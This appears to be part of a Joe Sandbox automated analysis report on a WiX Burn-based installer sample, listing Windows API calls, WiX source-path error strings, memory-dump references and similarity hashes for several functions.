                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6c90381bd65976704d230974f0240080539df36b10b2c210f7bcfd8e253fcde
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A01967165031AFBEB148B58DC4AFAFB76CEB10764F50822AF914D61D1D7B0AE50CAA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,0093D6D1,00000000,008E6EDE,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,008F713E), ref: 0093C860
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                            • String ID: Failed to read registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3660427363-2776790363
                                                                                                                                                                                                                                                                            • Opcode ID: 5ff13e27b4a18c3dc6c31d3176485148fdb80e3042179afead8100d896f5c6b0
                                                                                                                                                                                                                                                                            • Instruction ID: 1b5db3d443c3c22b13bb02fb5ae12f5581927c5918bdc5f63e687e9f06186436
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ff13e27b4a18c3dc6c31d3176485148fdb80e3042179afead8100d896f5c6b0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B0126B6B40A1573D720191B4C09F6B6A9EDBC6B70F15402ABA08FB250ED70CD028BF0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: GetProcessHeap.KERNEL32(00000000,?,?,?,0090DE2B,?), ref: 008E55D3
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: RtlFreeHeap.NTDLL(00000000,?,?,0090DE2B,?), ref: 008E55DA
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: GetLastError.KERNEL32(?,?,0090DE2B,?), ref: 008E55E4
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 008F5793
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: FreeLibrary.KERNEL32(?), ref: 008F57BA
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: GetLastError.KERNEL32 ref: 008F57C4
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 008E6DBC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E6DCB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast$AddressCloseCriticalDeleteHandleLibraryProcProcessSection
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2696942647-727612987
                                                                                                                                                                                                                                                                            • Opcode ID: d8cbadaf41916a375e4c5ee9ec6883d970c51cd549f10c60b5a89db99e2e50c2
                                                                                                                                                                                                                                                                            • Instruction ID: 7220ceed7fa15e7c12e2b81cf26a21d6a0fec14b09718ac4247f9918b0eb1847
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8cbadaf41916a375e4c5ee9ec6883d970c51cd549f10c60b5a89db99e2e50c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6118771A00249EFCF01ABA9CC86FECBBB9FB15319F144026F211E1061E3729A60DB11
APIs
• RegSetValueExW.ADVAPI32(?,008F8FA9,?,00000000,?,?,?,?), ref: 0093D738
Strings
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: Value
• String ID: Failed to set %ls value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 3702945584-457337809
• Opcode ID: fe09a0c48393ff49803de5718b387e78fa804cc369cc7501c10589f2ed6862b4
• Instruction ID: 409c1319b81e52471b1e9ba345fb3c0e2f677e6cc9a63c641d6fde34cf97e9c7
• Opcode Fuzzy Hash: fe09a0c48393ff49803de5718b387e78fa804cc369cc7501c10589f2ed6862b4
• Instruction Fuzzy Hash: E5F0F67B20126477EB212A176C09E5F3E6DEBC6B60F054025BF1897250E6318C01D6B0
APIs
• GetNativeSystemInfo.KERNEL32(?), ref: 008E997C
Strings
• d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E99C0
• Failed to set variant value., xrefs: 008E99AE
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: InfoNativeSystem
• String ID: Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
• API String ID: 1721193555-2731189036
• Opcode ID: 42a98748cbb4795b478623062d3340004a9d8cd6e6da2c95c943a385397a8f33
• Instruction ID: 4a82c27cbfe21dbcacb7dfc0a1ab59db0453bdcb0b5d7c74f377b89bf98e4c88
• Opcode Fuzzy Hash: 42a98748cbb4795b478623062d3340004a9d8cd6e6da2c95c943a385397a8f33
• Instruction Fuzzy Hash: 39F0F972D016187ADF01EBD9DC0AEDEBBB9FB45714F004425FA54FA190E3B09908CB91
APIs
  • Part of subcall function 008E2B25: FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0090D303,00000000,00000008,00000000,80070656), ref: 008E2B56
  • Part of subcall function 008E2B25: GetLastError.KERNEL32(?,?,?,0090D303,00000000,00000008,00000000,80070656,?,?,008FA7BB,00000001,00000000,80070656,00000000,?), ref: 008E2B63
  • Part of subcall function 008E2B25: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0090D303,00000000,00000008,00000000,80070656,?,?,008FA7BB,00000001), ref: 008E2BE7
• MessageBoxW.USER32(00000000,00000000,?,00001010), ref: 0090D349
Strings
• Failed to allocate string to display error message, xrefs: 0090D30C
• d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp, xrefs: 0090D31B
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: Message$ErrorFormatFreeLastLocal
• String ID: Failed to allocate string to display error message$d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp
• API String ID: 2195691534-719764090
• Opcode ID: cf909ddcd24fd79829e4af94c013452699443e1b1525d053167d2b472783ded5
• Instruction ID: 9d171406a598b9810b9c73979c57ccc4dab637558b4b669383a996c906a3472a
• Opcode Fuzzy Hash: cf909ddcd24fd79829e4af94c013452699443e1b1525d053167d2b472783ded5
• Instruction Fuzzy Hash: 4D01D632941318FBDF259FC58C0AFDD7A68EB01799F148010FA04A50D4D2B49A54E792
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.clean.room,?,?,?,008E1144,?,?,00000000), ref: 008E79EF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,008E1144,?,?,00000000), ref: 008E7A1F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareStringlstrlen
                                                                                                                                                                                                                                                                            • String ID: burn.clean.room
                                                                                                                                                                                                                                                                            • API String ID: 1433953587-3055529264
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: SysAllocString.OLEAUT32(00000000), ref: 009400C9
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: VariantInit.OLEAUT32(?), ref: 009400D5
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: VariantClear.OLEAUT32(?), ref: 009401C4
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: SysFreeString.OLEAUT32(00000000), ref: 009401CF
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009403CD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0094039E
                                                                                                                                                                                                                                                                            • Failed to get value from attribute., xrefs: 0094038F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                                                                                                                                            • String ID: Failed to get value from attribute.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3379191133-973041108
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F90F5
                                                                                                                                                                                                                                                                            • Failed to write %ls value., xrefs: 008F9188
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2586049171
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F90F5
                                                                                                                                                                                                                                                                            • Failed to write %ls value., xrefs: 008F91BA
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2586049171
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F90F5
                                                                                                                                                                                                                                                                            • Failed to write %ls value., xrefs: 008F9159
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2586049171
                                                                                                                                                                                                                                                                            • Opcode ID: 9af762e849fa0bda52ab214233c567cbc7d99c81632d4956bb27d144eb73a08b
                                                                                                                                                                                                                                                                            • Instruction ID: 154518fe0b1d6dcd9b028614c28d600ab3d68db749447c675fd3727570cfb689
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af762e849fa0bda52ab214233c567cbc7d99c81632d4956bb27d144eb73a08b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DE06530B04208A6DF11AAA5FC0BFBEBA61FB8570DF11015AF652A01D199A54654DA52
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to update name and publisher., xrefs: 008F93EF
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F9959
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to update name and publisher.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-1652864479
                                                                                                                                                                                                                                                                            • Opcode ID: c3b24e7db9101739ff3419b20173fda542f64f16fad94e6d7185177a0ed5e1d8
                                                                                                                                                                                                                                                                            • Instruction ID: 381361954415bcf09ea1a8030a9da93d445287c812e4e02e9eb79d1fc878f9bb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3b24e7db9101739ff3419b20173fda542f64f16fad94e6d7185177a0ed5e1d8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAE09230B04309A7DB11EAA5FC0BFBEBB61FB8170EF10011AF742E01D18AF44A54DA82